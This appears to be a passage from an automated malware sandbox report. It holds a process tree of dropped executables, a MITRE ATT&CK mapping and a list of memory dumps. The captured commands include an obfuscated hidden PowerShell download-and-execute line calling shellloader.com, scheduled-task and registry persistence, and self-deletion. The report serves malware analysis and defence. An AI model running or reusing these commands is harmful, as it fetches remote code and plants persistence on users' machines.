        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7464
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6696
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7516
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6592
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1656
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5396
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5144
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5408
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7528
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4940
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4336
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5924
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5908
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7348
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4380
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11141271fbe5877f.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:460
    - - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11141271fbe5877f.exe
        
        Tue11141271fbe5877f.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2256
      - C:\ProgramData\4011936.exe
        
        "C:\ProgramData\4011936.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4444
      - C:\ProgramData\6680710.exe
        
        "C:\ProgramData\6680710.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4600
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        
        PID:5324
      - C:\ProgramData\7894657.exe
        
        "C:\ProgramData\7894657.exe"
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:3744
      - C:\ProgramData\2566371.exe
        
        "C:\ProgramData\2566371.exe"
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:836
      - C:\ProgramData\7652384.exe
        
        "C:\ProgramData\7652384.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2172
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue118f55232e4.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3068
    - - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue118f55232e4.exe
        
        Tue118f55232e4.exe
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:3132
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:3064
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:4348
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue112c483dd3245d.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:636

C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue112c483dd3245d.exe
Tue112c483dd3245d.exe
1⤵
- Executes dropped EXE
PID:1956
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /im Tue112c483dd3245d.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue112c483dd3245d.exe" & del C:\ProgramData\*.dll & exit
  2⤵
  PID:4712
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im Tue112c483dd3245d.exe /f
    3⤵
    - Kills process with taskkill
    PID:5604
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 6
    3⤵
    - Delays execution with timeout.exe
    PID:4380

C:\Users\Admin\AppData\Local\Temp\is-G5MMQ.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-G5MMQ.tmp\setup_2.tmp" /SL5="$50156,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
1⤵
- Executes dropped EXE
PID:5236
- C:\Users\Admin\AppData\Local\Temp\is-RJ4PR.tmp\postback.exe
  "C:\Users\Admin\AppData\Local\Temp\is-RJ4PR.tmp\postback.exe" ss1
  2⤵
  PID:5444
- - C:\Windows\SysWOW64\explorer.exe
    explorer.exe ss1
    3⤵
    PID:3896
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
      4⤵
      PID:3612
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        5⤵
        
        PID:3976
  - - C:\Users\Admin\AppData\Local\Temp\5QW1sc9EM.exe
      "C:\Users\Admin\AppData\Local\Temp\5QW1sc9EM.exe"
      4⤵
      PID:6964
    - - C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"
        5⤵
        
        PID:5792
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\
        6⤵
        
        PID:1192
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\
        7⤵
        
        PID:6212
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe" /F
        6⤵
        Creates scheduled task(s)
        
        PID:6232
  - - C:\Users\Admin\AppData\Local\Temp\jo27JzEPu.exe
      "C:\Users\Admin\AppData\Local\Temp\jo27JzEPu.exe"
      4⤵
      PID:6192

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:1288
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:4972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:5496

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:2980
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:5672
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5672 -s 624
    3⤵
    - Program crash
    PID:1020

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:7048

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:4396
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding C7C2AED081BEE812ABC2D00CCC51B455 C
  2⤵
  PID:6116
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding F572EFF6AD58737E23A717BB24545CC7
  2⤵
  PID:4600
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:5108
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding F0E435278CB17F9E3BA870B183BFDA7F E Global\MSI0000
  2⤵
  PID:8124

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5044

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6568

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6652

C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
1⤵
PID:5388

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4264

C:\Users\Admin\AppData\Local\Temp\126B.exe
C:\Users\Admin\AppData\Local\Temp\126B.exe
1⤵
PID:7784

C:\Users\Admin\AppData\Local\Temp\272C.exe
C:\Users\Admin\AppData\Local\Temp\272C.exe
1⤵
PID:4796

C:\Users\Admin\AppData\Local\Temp\5C76.exe
C:\Users\Admin\AppData\Local\Temp\5C76.exe
1⤵
PID:4568

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6192

C:\Users\Admin\AppData\Local\Temp\8106.exe
C:\Users\Admin\AppData\Local\Temp\8106.exe
1⤵
PID:4328

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6368

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/68-548-0x000001E321F00000-0x000001E321F74000-memory.dmp

Filesize
464KB

Download
memory/568-519-0x000001E46DAA0000-0x000001E46DB14000-memory.dmp

Filesize
464KB

Download
memory/568-516-0x000001E46D9E0000-0x000001E46DA2D000-memory.dmp

Filesize
308KB

Download
memory/596-565-0x0000019047C60000-0x0000019047CD4000-memory.dmp

Filesize
464KB

Download
memory/628-198-0x0000000002B50000-0x0000000002BFE000-memory.dmp

Filesize
696KB

Download
memory/628-201-0x0000000000400000-0x0000000002B48000-memory.dmp

Filesize
39.3MB

Download
memory/748-174-0x0000000000400000-0x000000000046D000-memory.dmp

Filesize
436KB

Download
memory/836-327-0x0000000077E20000-0x0000000077FAE000-memory.dmp

Filesize
1.6MB

Download
memory/836-352-0x0000000005530000-0x0000000005B36000-memory.dmp

Filesize
6.0MB

Download
memory/1076-563-0x000001F319E70000-0x000001F319EE4000-memory.dmp

Filesize
464KB

Download
memory/1204-566-0x00000168EFD60000-0x00000168EFDD4000-memory.dmp

Filesize
464KB

Download
memory/1212-573-0x000001F680D40000-0x000001F680DB4000-memory.dmp

Filesize
464KB

Download
memory/1344-197-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/1404-567-0x00000252C4950000-0x00000252C49C4000-memory.dmp

Filesize
464KB

Download
memory/1852-570-0x0000028E5AEA0000-0x0000028E5AF14000-memory.dmp

Filesize
464KB

Download
memory/1956-218-0x0000000000400000-0x0000000002BB2000-memory.dmp

Filesize
39.7MB

Download
memory/1956-199-0x00000000048C0000-0x0000000004991000-memory.dmp

Filesize
836KB

Download
memory/2172-330-0x0000000005640000-0x0000000005641000-memory.dmp

Filesize
4KB

Download
memory/2172-309-0x0000000000CC0000-0x0000000000CC1000-memory.dmp

Filesize
4KB

Download
memory/2256-190-0x000000001BB70000-0x000000001BB72000-memory.dmp

Filesize
8KB

Download
memory/2256-183-0x0000000001470000-0x0000000001485000-memory.dmp

Filesize
84KB

Download
memory/2256-171-0x0000000000F60000-0x0000000000F61000-memory.dmp

Filesize
4KB

Download
memory/2424-547-0x000001ACF6040000-0x000001ACF60B4000-memory.dmp

Filesize
464KB

Download
memory/2476-550-0x00000141E4560000-0x00000141E45D4000-memory.dmp

Filesize
464KB

Download
memory/2696-574-0x000001BB25840000-0x000001BB258B4000-memory.dmp

Filesize
464KB

Download
memory/2788-541-0x0000027922B70000-0x0000027922BE4000-memory.dmp

Filesize
464KB

Download
memory/2996-293-0x0000000000E90000-0x0000000000EA5000-memory.dmp

Filesize
84KB

Download
memory/3012-166-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/3012-131-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/3012-180-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/3012-162-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/3012-159-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/3012-132-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/3012-130-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/3620-202-0x0000000002B70000-0x0000000002CBA000-memory.dmp

Filesize
1.3MB

Download
memory/3620-211-0x0000000000400000-0x0000000002B61000-memory.dmp

Filesize
39.4MB

Download
memory/3744-305-0x0000000000120000-0x0000000000121000-memory.dmp

Filesize
4KB

Download
memory/3744-306-0x0000000077E20000-0x0000000077FAE000-memory.dmp

Filesize
1.6MB

Download
memory/3744-328-0x00000000054D0000-0x0000000005AD6000-memory.dmp

Filesize
6.0MB

Download
memory/3796-156-0x0000000000A10000-0x0000000000A11000-memory.dmp

Filesize
4KB

Download
memory/3796-169-0x000000001B6C0000-0x000000001B6C2000-memory.dmp

Filesize
8KB

Download
memory/4012-208-0x0000000007250000-0x0000000007251000-memory.dmp

Filesize
4KB

Download
memory/4012-215-0x00000000073F0000-0x00000000073F1000-memory.dmp

Filesize
4KB

Download
memory/4012-423-0x00000000040B3000-0x00000000040B4000-memory.dmp

Filesize
4KB

Download
memory/4012-210-0x0000000006B60000-0x0000000006B61000-memory.dmp

Filesize
4KB

Download
memory/4012-402-0x000000007F740000-0x000000007F741000-memory.dmp

Filesize
4KB

Download
memory/4012-223-0x00000000074B0000-0x00000000074B1000-memory.dmp

Filesize
4KB

Download
memory/4012-282-0x0000000007460000-0x0000000007461000-memory.dmp

Filesize
4KB

Download
memory/4012-280-0x00000000073A0000-0x00000000073A1000-memory.dmp

Filesize
4KB

Download
memory/4012-193-0x00000000040B0000-0x00000000040B1000-memory.dmp

Filesize
4KB

Download
memory/4012-191-0x00000000040B2000-0x00000000040B3000-memory.dmp

Filesize
4KB

Download
memory/4012-192-0x0000000006BF0000-0x0000000006BF1000-memory.dmp

Filesize
4KB

Download
memory/4012-189-0x0000000004100000-0x0000000004101000-memory.dmp

Filesize
4KB

Download
memory/4060-194-0x0000000004E50000-0x0000000004E51000-memory.dmp

Filesize
4KB

Download
memory/4060-187-0x0000000000590000-0x0000000000591000-memory.dmp

Filesize
4KB

Download
memory/4060-196-0x00000000010A0000-0x00000000010A1000-memory.dmp

Filesize
4KB

Download
memory/4060-200-0x0000000005010000-0x0000000005011000-memory.dmp

Filesize
4KB

Download
memory/4100-374-0x000000001BC70000-0x000000001BC72000-memory.dmp

Filesize
8KB

Download
memory/4292-285-0x0000000004F10000-0x0000000004F11000-memory.dmp

Filesize
4KB

Download
memory/4292-278-0x0000000005380000-0x0000000005381000-memory.dmp

Filesize
4KB

Download
memory/4292-292-0x0000000004E70000-0x0000000004E71000-memory.dmp

Filesize
4KB

Download
memory/4292-288-0x0000000004D70000-0x0000000005376000-memory.dmp

Filesize
6.0MB

Download
memory/4292-284-0x0000000004DE0000-0x0000000004DE1000-memory.dmp

Filesize
4KB

Download
memory/4292-270-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/4300-206-0x0000000000080000-0x0000000000081000-memory.dmp

Filesize
4KB

Download
memory/4300-400-0x00000000054A0000-0x00000000054A1000-memory.dmp

Filesize
4KB

Download
memory/4332-377-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/4392-214-0x0000000000660000-0x0000000000661000-memory.dmp

Filesize
4KB

Download
memory/4444-245-0x0000000000C20000-0x0000000000C21000-memory.dmp

Filesize
4KB

Download
memory/4444-221-0x0000000000680000-0x0000000000681000-memory.dmp

Filesize
4KB

Download
memory/4444-255-0x000000001B420000-0x000000001B422000-memory.dmp

Filesize
8KB

Download
memory/4444-237-0x0000000000BD0000-0x0000000000C1B000-memory.dmp

Filesize
300KB

Download
memory/4444-228-0x00000000007F0000-0x00000000007F1000-memory.dmp

Filesize
4KB

Download
memory/4452-353-0x0000000004DA0000-0x00000000053A6000-memory.dmp

Filesize
6.0MB

Download
memory/4520-238-0x0000000001640000-0x0000000001655000-memory.dmp

Filesize
84KB

Download
memory/4520-227-0x0000000000F30000-0x0000000000F31000-memory.dmp

Filesize
4KB

Download
memory/4520-248-0x000000001BB20000-0x000000001BB22000-memory.dmp

Filesize
8KB

Download
memory/4572-404-0x0000000004C50000-0x0000000005256000-memory.dmp

Filesize
6.0MB

Download
memory/4580-287-0x0000000004880000-0x0000000004951000-memory.dmp

Filesize
836KB

Download
memory/4580-291-0x0000000000400000-0x0000000002BB2000-memory.dmp

Filesize
39.7MB

Download
memory/4600-266-0x0000000009DA0000-0x0000000009DA1000-memory.dmp

Filesize
4KB

Download
memory/4600-258-0x0000000002160000-0x000000000216C000-memory.dmp

Filesize
48KB

Download
memory/4600-240-0x0000000000040000-0x0000000000041000-memory.dmp

Filesize
4KB

Download
memory/4600-261-0x000000000A1C0000-0x000000000A1C1000-memory.dmp

Filesize
4KB

Download
memory/4600-268-0x0000000009D80000-0x0000000009D81000-memory.dmp

Filesize
4KB

Download
memory/4600-250-0x0000000002150000-0x0000000002151000-memory.dmp

Filesize
4KB

Download
memory/4656-242-0x0000000000FA0000-0x0000000000FA1000-memory.dmp

Filesize
4KB

Download
memory/4656-249-0x00000000016C0000-0x00000000016C2000-memory.dmp

Filesize
8KB

Download
memory/4720-303-0x0000000000400000-0x0000000002B53000-memory.dmp

Filesize
39.3MB

Download
memory/4720-295-0x00000000001D0000-0x00000000001FF000-memory.dmp

Filesize
188KB

Download
memory/4732-406-0x0000000004EF0000-0x0000000004EF1000-memory.dmp

Filesize
4KB

Download
memory/4764-276-0x0000000002330000-0x0000000002332000-memory.dmp

Filesize
8KB

Download
memory/4820-326-0x0000000004C70000-0x0000000004C71000-memory.dmp

Filesize
4KB

Download
memory/4820-315-0x0000000000380000-0x0000000000381000-memory.dmp

Filesize
4KB

Download
memory/4840-269-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/4932-273-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/4972-513-0x0000000004229000-0x000000000432A000-memory.dmp

Filesize
1.0MB

Download
memory/4972-518-0x0000000004040000-0x000000000409F000-memory.dmp

Filesize
380KB

Download
memory/5084-323-0x0000000004CD0000-0x00000000052D6000-memory.dmp

Filesize
6.0MB

Download
memory/5148-445-0x00000000054E0000-0x0000000005AE6000-memory.dmp

Filesize
6.0MB

Download
memory/5236-407-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/5324-424-0x00000000056B0000-0x00000000056B1000-memory.dmp

Filesize
4KB

Download
memory/5496-544-0x000002BA16E70000-0x000002BA16EE4000-memory.dmp

Filesize
464KB

Download
memory/5684-511-0x0000000005180000-0x0000000005786000-memory.dmp

Filesize
6.0MB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Extracted

Extracted

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads